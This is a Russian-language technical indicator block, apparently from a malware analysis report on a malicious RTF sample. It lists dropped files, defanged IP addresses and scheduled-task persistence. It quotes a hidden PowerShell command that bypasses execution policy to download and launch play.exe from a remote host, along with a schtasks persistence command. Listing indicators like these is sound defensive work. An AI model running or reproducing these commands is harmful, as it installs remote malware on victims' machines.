Техническая информация
- <SYSTEM32>\tasks\updates\nvmjeecyi
- http://15#.#5.173.72/music/play.exe как %appdata%\play.exe
- play.exe
- %TEMP%\abctfhghgdghgh‹.sct
- %APPDATA%\play.exe
- <Текущая директория>\~wrd0000.tmp
- %APPDATA%\nvmjeecyi.exe
- %TEMP%\tmpb8d3.tmp
- %APPDATA%\nvmjeecyi.exe
- %TEMP%\abctfhghgdghgh‹.sct
- %TEMP%\tmpb8d3.tmp
- <PATH_SAMPLE>.rtf
- '15#.#5.173.72':80
- '40.#3.20.77':8700
- '40.#3.20.77':8700
- '%APPDATA%\play.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://15#.#5.173.72/music/play.exe','%APPDATA%\play.exe');Start-Process '%AP...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\NVmJeeCyi" /XML "%TEMP%\tmpB8D3.tmp"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\NVmJeeCyi" /XML "%TEMP%\tmpB8D3.tmp"